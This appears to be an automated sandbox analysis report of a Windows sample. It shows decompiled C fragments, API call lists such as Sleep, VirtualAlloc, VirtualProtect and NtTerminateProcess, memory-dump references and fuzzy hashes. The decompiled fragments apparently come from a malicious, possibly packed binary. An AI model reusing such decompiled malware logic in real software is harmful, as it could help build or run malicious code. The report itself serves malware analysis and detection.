                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t11 = E004013F1(_t17, _t21, __edi, __esi, _t17,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t26 - 4); // executed
                                                                                                                                    				_t33 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					_push( *((intOrPtr*)(_t26 + 0x14)));
                                                                                                                                    					_push( *((intOrPtr*)(_t26 - 4)));
                                                                                                                                    					_push(_t11);
                                                                                                                                    					_push(_t17); // executed
                                                                                                                                    					E004014CF(_t11, _t17, 0x63, _t21, _t22, _t24); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t13 =  *_t29;
                                                                                                                                    				return L004011BF(_t13, _t22, _t24, _t26, _t33);
                                                                                                                                    			}












                                                                                                                                    0x004018a2
                                                                                                                                    0x004018a2
                                                                                                                                    0x004018a3
                                                                                                                                    0x0040189f
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480899227.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 2b4f686a24ac73ea9ddbf2007643a97ac3829562a52fb203e6efae52d12ca41b
                                                                                                                                    • Instruction ID: 4ab959d6f45887d16d6038ac862886a060d9e601cb6538da37887895e8bdb08d
                                                                                                                                    • Opcode Fuzzy Hash: 2b4f686a24ac73ea9ddbf2007643a97ac3829562a52fb203e6efae52d12ca41b
                                                                                                                                    • Instruction Fuzzy Hash: 0EF08677608204EBEB016AD19CD1E793216DB44314F308237B613791F1C63D8752B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                    			E004018A6(intOrPtr* __eax, signed int __ebx, void* __edi, void* __esi) {
                                                                                                                                    				void* _t11;
                                                                                                                                    				intOrPtr _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t21;
                                                                                                                                    				signed int _t26;
                                                                                                                                    				signed int _t27;
                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    
                                                                                                                                    				_t24 = __esi;
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_t27 = _t26 & __ebx;
                                                                                                                                    				asm("arpl [eax], ax");
                                                                                                                                    				 *__eax =  *__eax + __eax;
                                                                                                                                    				_t33 =  *__eax;
                                                                                                                                    				L004011BF(__eax, __edi, __esi, _t27, _t33);
                                                                                                                                    				_t17 =  *((intOrPtr*)(_t27 + 8));
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_t11 = E004013F1(_t17, _t21, __edi, __esi, _t17,  *((intOrPtr*)(_t27 + 0xc)),  *((intOrPtr*)(_t27 + 0x10)), _t27 - 4); // executed
                                                                                                                                    				_t34 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					_push( *((intOrPtr*)(_t27 + 0x14)));
                                                                                                                                    					_push( *((intOrPtr*)(_t27 - 4)));
                                                                                                                                    					_push(_t11);
                                                                                                                                    					_push(_t17); // executed
                                                                                                                                    					E004014CF(_t11, _t17, 0x63, _t21, __edi, __esi); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0); // executed
                                                                                                                                    				_push(0x18bd);
                                                                                                                                    				_t13 =  *_t29;
                                                                                                                                    				return L004011BF(_t13, _t22, _t24, _t27, _t34);
                                                                                                                                    			}











                                                                                                                                    0x004018a6
                                                                                                                                    0x004018a6
                                                                                                                                    0x004018a6
                                                                                                                                    0x004018ad
                                                                                                                                    0x004018af
                                                                                                                                    0x004018af
                                                                                                                                    0x004018b8
                                                                                                                                    0x004018bd
                                                                                                                                    0x004018c5
                                                                                                                                    0x004018d3
                                                                                                                                    0x004018d8
                                                                                                                                    0x004018da
                                                                                                                                    0x004018dc
                                                                                                                                    0x004018df
                                                                                                                                    0x004018e2
                                                                                                                                    0x004018e3
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018e4
                                                                                                                                    0x004018ed
                                                                                                                                    0x004018f6
                                                                                                                                    0x004018fb
                                                                                                                                    0x00401924

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018C5
                                                                                                                                    • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480899227.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSleepTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 417527130-0
                                                                                                                                    • Opcode ID: 2873ec6c5a14247843905e31c4b0b3868c49a6aa804f4dd152b7ea4872c72180
                                                                                                                                    • Instruction ID: 202d679f9ec56a319523a7389e1cb688250d9d9e570aac88d51226151daca0e3
                                                                                                                                    • Opcode Fuzzy Hash: 2873ec6c5a14247843905e31c4b0b3868c49a6aa804f4dd152b7ea4872c72180
                                                                                                                                    • Instruction Fuzzy Hash: 22F06876204204FBDB016AD58CD1EAE3366DB45314F244137B613791E1D63D8B12B76B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __putw.LIBCMTD ref: 00418364
                                                                                                                                      • Part of subcall function 0042F1B0: __errno.LIBCMTD ref: 0042F225
                                                                                                                                      • Part of subcall function 0042F1B0: __invalid_parameter.LIBCMTD ref: 0042F243
                                                                                                                                      • Part of subcall function 00418AE0: _abort.LIBCMTD ref: 00418B49
                                                                                                                                    • _memset.LIBCMT ref: 0041856C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno__invalid_parameter__putw_abort_memset
                                                                                                                                    • String ID: jjj$jjj$jjjj$jjjj$jjjj$jjjj$u!j$v<$\H$`?$`?
                                                                                                                                    • API String ID: 1942346954-237119583
                                                                                                                                    • Opcode ID: 65fe7c806f232d253e7964e6259cb7f45db93805758a9c0b028cf7024829dabe
                                                                                                                                    • Instruction ID: bbfe80e562a95304392bb45b445a9bca0669809f7def545aac120af89fb7fc6f
                                                                                                                                    • Opcode Fuzzy Hash: 65fe7c806f232d253e7964e6259cb7f45db93805758a9c0b028cf7024829dabe
                                                                                                                                    • Instruction Fuzzy Hash: 8312EE71A84215BBE754ABE0DE4AFAE7B74FB08B42F104129F309B91F0DAB415408B6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CheckMemory__heap_alloc_base
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4254127243-0
                                                                                                                                    • Opcode ID: 9b9236441cf0b8fceca1a2c28f44137038f3e6ce93a4eb34d50f7cc38c060644
                                                                                                                                    • Instruction ID: 41538179298042e35684228d91def985c7c2290ce95505a8b354278872a1ee14
                                                                                                                                    • Opcode Fuzzy Hash: 9b9236441cf0b8fceca1a2c28f44137038f3e6ce93a4eb34d50f7cc38c060644
                                                                                                                                    • Instruction Fuzzy Hash: D7B16FB1A00204EFDB14CF54D995BEA77F1FB48304F20826AE9156B391D379AD90CFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Qa
                                                                                                                                    • API String ID: 0-3901847582
                                                                                                                                    • Opcode ID: 370317995ec2dff89957e0c657009e2ba573b5e8bc7abdf8e057830b77d86ab8
                                                                                                                                    • Instruction ID: c33759237269e1fca94575ef7c4f947a98783ded9113130bc61e1173070db44d
                                                                                                                                    • Opcode Fuzzy Hash: 370317995ec2dff89957e0c657009e2ba573b5e8bc7abdf8e057830b77d86ab8
                                                                                                                                    • Instruction Fuzzy Hash: B101D6F160220AEFDB14DF55D844FEB73A4AB48304F10855AF90987284E73CEAA7DB56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 394987441-0
                                                                                                                                    • Opcode ID: 847ff5a3e718e9a4b0a78f5efb8aadb9ef95ab767603f48fb40c6e37dd066d7a
                                                                                                                                    • Instruction ID: 8d3471eafe8835ee1c8773e02ed7ef17068d6816fa5f375bb0d5963605cba335
                                                                                                                                    • Opcode Fuzzy Hash: 847ff5a3e718e9a4b0a78f5efb8aadb9ef95ab767603f48fb40c6e37dd066d7a
                                                                                                                                    • Instruction Fuzzy Hash: 240128B1A00108EFCB04DFA8D985ADE33B9EB88314F10C65AF9198B290D734EE51CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • ___security_init_cookie.LIBCMTD ref: 00418CA5
                                                                                                                                    • ___tmainCRTStartup.LIBCMTD ref: 00418CAA
                                                                                                                                      • Part of subcall function 00418CC0: _check_managed_app.LIBCMTD ref: 00418D1D
                                                                                                                                      • Part of subcall function 00418CC0: __heap_init.LIBCMTD ref: 00418D25
                                                                                                                                      • Part of subcall function 00418CC0: _fast_error_exit.LIBCMTD ref: 00418D30
                                                                                                                                      • Part of subcall function 00418CC0: __mtinit.LIBCMTD ref: 00418D38
                                                                                                                                      • Part of subcall function 00418CC0: _fast_error_exit.LIBCMTD ref: 00418D43
                                                                                                                                      • Part of subcall function 00418CC0: __RTC_Initialize.LIBCMTD ref: 00418D55
                                                                                                                                      • Part of subcall function 00418CC0: __ioinit.LIBCMTD ref: 00418D61
                                                                                                                                      • Part of subcall function 00418CC0: ___crtGetEnvironmentStringsW.LIBCMTD ref: 00418D7F
                                                                                                                                      • Part of subcall function 00418CC0: ___wsetargv.LIBCMTD ref: 00418D89
                                                                                                                                      • Part of subcall function 00418CC0: __wsetenvp.LIBCMTD ref: 00418D9C
                                                                                                                                      • Part of subcall function 00418CC0: __cinit.LIBCMTD ref: 00418DB1
                                                                                                                                      • Part of subcall function 00418CC0: __wwincmdln.LIBCMTD ref: 00418DCE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _fast_error_exit$EnvironmentInitializeStartupStrings___crt___security_init_cookie___tmain___wsetargv__cinit__heap_init__ioinit__mtinit__wsetenvp__wwincmdln_check_managed_app
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3887909383-0
                                                                                                                                    • Opcode ID: cd3a7f06abb22330ecb677000d10ca525c99775dfb4ef4cbec5555c5ccb8c32e
                                                                                                                                    • Instruction ID: d14779e2bfa4b655208d67e8ca308a61278b2062ed2b93799b7abc8a5b7318f4
                                                                                                                                    • Opcode Fuzzy Hash: cd3a7f06abb22330ecb677000d10ca525c99775dfb4ef4cbec5555c5ccb8c32e
                                                                                                                                    • Instruction Fuzzy Hash: 1EA0223208028C020A0033E3300388A320C0CC032C380003FF00C032032E0CACC080FE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 007EAAA9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.481154974.00000000007E6000.00000040.00000001.sdmp, Offset: 007E6000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FirstModule32
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3757679902-0
                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction ID: c0f71b03d943ed214d65c8f989d4750ccf387d34883afe6d440697bfa4b1c4fd
                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                    • Instruction Fuzzy Hash: 02F062311017117BD7207ABAA98DB6A77E8AF4D724F104538E642910C0DAB4FC4586A2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(004B6D84,004BA784,00000040,?), ref: 004180ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: 974f0182f36fae0130d04bd8719ffb4cb418ce75eaf8138526db9a57f92dd9f2
                                                                                                                                    • Instruction ID: c11df730057445d1e37bdc56fe05d896f58abc429dde4dc12fb12d1994443217
                                                                                                                                    • Opcode Fuzzy Hash: 974f0182f36fae0130d04bd8719ffb4cb418ce75eaf8138526db9a57f92dd9f2
                                                                                                                                    • Instruction Fuzzy Hash: A501E8B11563449AD300CF67FD86B593BA8FB19B00B90612DE9C4972F2D7B525018B1E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlEncodePointer.NTDLL(00000000,?,00420FFE), ref: 00418F87
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EncodePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2118026453-0
                                                                                                                                    • Opcode ID: f48d723115d5cc3a86c1b61a3e1e7ce5d0a3c77581f181bcb01f425ab8a3b3b3
                                                                                                                                    • Instruction ID: a85be009532e0f9f2552ed285ef84f095175ae779807d918d475cdc5975e574a
                                                                                                                                    • Opcode Fuzzy Hash: f48d723115d5cc3a86c1b61a3e1e7ce5d0a3c77581f181bcb01f425ab8a3b3b3
                                                                                                                                    • Instruction Fuzzy Hash: B6A01132088208A3C2002282AA0AB023A0CE3C0BA2F0800A0F20CA20A00AA2A80080AA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007EA771
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.481154974.00000000007E6000.00000040.00000001.sdmp, Offset: 007E6000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction ID: d715cb01ddc7290dd3cb1497cca4f766c6055a9ba384398f7bc8bab098f055b2
                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction Fuzzy Hash: 14115B79A00208FFDB01DF98C985E88BBF1AF08351F0580A4F9489B362D335EA50DF80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,004BA784,004187B0), ref: 00418108
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                    • Opcode ID: b9a930ebdd9ac1d8ca6c8d6c7bb0bdeef271628920e3fd060269c94e7f82acf7
                                                                                                                                    • Instruction ID: 3ff3e600a0cc0fe486703aa6386ae0d81b48b17b5da473be9ef94feed30ed30d
                                                                                                                                    • Opcode Fuzzy Hash: b9a930ebdd9ac1d8ca6c8d6c7bb0bdeef271628920e3fd060269c94e7f82acf7
                                                                                                                                    • Instruction Fuzzy Hash: FBB012B12053009FDB008F60EE08B103778E304302F000131F508D1170CB744440DB1A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    APIs
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 004230F2
                                                                                                                                    • _wcscat_s.LIBCMTD ref: 0042330A
                                                                                                                                      • Part of subcall function 004271C0: __errno.LIBCMTD ref: 00427214
                                                                                                                                      • Part of subcall function 004271C0: __invalid_parameter.LIBCMTD ref: 00427232
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 00423313
                                                                                                                                      • Part of subcall function 0041A590: __invoke_watson.LIBCMTD ref: 0041A5B1
                                                                                                                                    • _wcscat_s.LIBCMTD ref: 00423342
                                                                                                                                      • Part of subcall function 004271C0: _memset.LIBCMT ref: 0042729B
                                                                                                                                      • Part of subcall function 004271C0: __errno.LIBCMTD ref: 004272D9
                                                                                                                                      • Part of subcall function 004271C0: __invalid_parameter.LIBCMTD ref: 004272F7
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042334B
                                                                                                                                    • __errno.LIBCMTD ref: 00423367
                                                                                                                                    • __errno.LIBCMTD ref: 00423374
                                                                                                                                    • __snwprintf_s.LIBCMTD ref: 004233A4
                                                                                                                                      • Part of subcall function 00420D20: __vsnprintf_s_l.LIBCMTD ref: 00420D42
                                                                                                                                    • __errno.LIBCMTD ref: 004233D5
                                                                                                                                    • __errno.LIBCMTD ref: 004233E5
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423422
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042342B
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423506
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042350F
                                                                                                                                    • __itow_s.LIBCMTD ref: 004230E9
                                                                                                                                      • Part of subcall function 004275A0: _xtow_s@20.LIBCMTD ref: 004275CB
                                                                                                                                    • __errno.LIBCMTD ref: 00423178
                                                                                                                                    • __errno.LIBCMTD ref: 00423185
                                                                                                                                    • __strftime_l.LIBCMTD ref: 004231A9
                                                                                                                                    • __errno.LIBCMTD ref: 004231DA
                                                                                                                                    • __errno.LIBCMTD ref: 004231EA
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423227
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 00423230
                                                                                                                                    • _wcscpy_s.LIBCMTD ref: 00423283
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 0042328C
                                                                                                                                    • _wcscat_s.LIBCMTD ref: 004232BD
                                                                                                                                    • __invoke_watson_if_error.LIBCMTD ref: 004232C6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno$__invoke_watson_if_error$_wcscpy_s$_wcscat_s$__invalid_parameter$__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
                                                                                                                                    • String ID: R<$h@[@$h@[@$hHW@$t8j$t9j$Y@
                                                                                                                                    • API String ID: 2214760961-596147245
                                                                                                                                    • Opcode ID: f89087cafd1c7e7146bc5447285ddfea915ad56eecb3243100028d4b92075b24
                                                                                                                                    • Instruction ID: 45ab13e19d6d4de1188432b19098a6a7fd7c9437b9cbdcfd77255558f2fad1fc
                                                                                                                                    • Opcode Fuzzy Hash: f89087cafd1c7e7146bc5447285ddfea915ad56eecb3243100028d4b92075b24
                                                                                                                                    • Instruction Fuzzy Hash: 720271B1A40714ABDB20DF50DC4AFDF7778AB48706F5041AAB6087A2C1D67C9B84CF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __errno.LIBCMTD ref: 00427A46
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427A5B
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427A91
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427AB2
                                                                                                                                    • wcsncnt.LIBCMTD ref: 00427AE9
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427B4F
                                                                                                                                    • __errno.LIBCMTD ref: 00427D8B
                                                                                                                                    • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427DA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale$UpdateUpdate::~_$__errno$wcsncnt
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 551976084-0
                                                                                                                                    • Opcode ID: 91c00467f29de1187a84d342770b8335cf879fc123f60d56276cee4bfbe269d3
                                                                                                                                    • Instruction ID: 19d2b186efd84de4868467185dd6cb419c95be88161fb661cef6a6a08671f810
                                                                                                                                    • Opcode Fuzzy Hash: 91c00467f29de1187a84d342770b8335cf879fc123f60d56276cee4bfbe269d3
                                                                                                                                    • Instruction Fuzzy Hash: 29E13831A14218EFCB04DF94D990BEEB7B1FF45304F60815AE4156B2A1DB38AE42CF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                    • String ID: -$9
                                                                                                                                    • API String ID: 3451365851-1631151375
                                                                                                                                    • Opcode ID: 69ebda3c1eaeda35ea94f29388418fd9264882509dc564e0fe4c4bbe02705599
                                                                                                                                    • Instruction ID: e32abe3bd0deab2e086104420cf3d57bd1f3489060862308a856ffc4aee659b3
                                                                                                                                    • Opcode Fuzzy Hash: 69ebda3c1eaeda35ea94f29388418fd9264882509dc564e0fe4c4bbe02705599
                                                                                                                                    • Instruction Fuzzy Hash: 7CF158B0E012299BDB24DF54DC99BAEB7B4FF84304F5481DAE409A7281D7389E80CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3455034128-2366072709
                                                                                                                                    • Opcode ID: b1ff1169a91f061947da2b839b58a9159c71eb7c80aef2aed3d540a618a7659c
                                                                                                                                    • Instruction ID: b6a3f9d515ef1ef3e6a2fb7ccd957e235d1b441fdea388a795fca59ea42e8813
                                                                                                                                    • Opcode Fuzzy Hash: b1ff1169a91f061947da2b839b58a9159c71eb7c80aef2aed3d540a618a7659c
                                                                                                                                    • Instruction Fuzzy Hash: 66F139B1E002299FDB24CF54DC81BAEB7B5FF84304F54819AE509A7241D738AE85CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
                                                                                                                                    • String ID: -
                                                                                                                                    • API String ID: 1135781078-2547889144
                                                                                                                                    • Opcode ID: b06cf7f0029964d44c85a0236f8d31e520f714e398d7efa443595447d1f4346d
                                                                                                                                    • Instruction ID: 4730b19b041c3bb3b168cc6bc2b9d13f66965915396ce7ba384321d615822954
                                                                                                                                    • Opcode Fuzzy Hash: b06cf7f0029964d44c85a0236f8d31e520f714e398d7efa443595447d1f4346d
                                                                                                                                    • Instruction Fuzzy Hash: 52A19DB0E012289BDB20DB55DC49BEEB7B4EF44304F5481DAE4197A281D7789ED0CF9A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3689974179-0
                                                                                                                                    • Opcode ID: 3ad636b7cbb21bc7a69b0e2ca12164be3f991341c05c49dc382bf6ea3cd7cb27
                                                                                                                                    • Instruction ID: f985891abb1110824def8d7feca30b6f637b63f4aed52b1ca283b97b289b9e6b
                                                                                                                                    • Opcode Fuzzy Hash: 3ad636b7cbb21bc7a69b0e2ca12164be3f991341c05c49dc382bf6ea3cd7cb27
                                                                                                                                    • Instruction Fuzzy Hash: 6FA180B0E002299BDF24DF54DC85BAEB770AF44304F54809AE6097B281D778AE85CF5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
                                                                                                                                    • String ID: -
                                                                                                                                    • API String ID: 2232461714-2547889144
                                                                                                                                    • Opcode ID: a09f3882343501fc87aa882e247176d352320efe4973b34f750a6641363afb4b
                                                                                                                                    • Instruction ID: d94c93211653af6ad1c0d63212757aa7c1d368f430ca51bdc707b28decfb7cbb
                                                                                                                                    • Opcode Fuzzy Hash: a09f3882343501fc87aa882e247176d352320efe4973b34f750a6641363afb4b
                                                                                                                                    • Instruction Fuzzy Hash: 6DA19CB0E012288BDB64CF54DC49BEEB7B0EF88304F5481DAE4096B291D7789E80CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 909868375-0
                                                                                                                                    • Opcode ID: ac3e3550c8b668a757f22858f4e93fda89a087faab499d5db515f639689e816b
                                                                                                                                    • Instruction ID: a17dae7330ecac01f43e0f07e466e5584ba4d3cf81f710ca55e0e3f2b187316c
                                                                                                                                    • Opcode Fuzzy Hash: ac3e3550c8b668a757f22858f4e93fda89a087faab499d5db515f639689e816b
                                                                                                                                    • Instruction Fuzzy Hash: 8CA18FB1E00228DFDB24DF54DC81BEEB7B4BB48304F54819AE50967281D738AE84CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
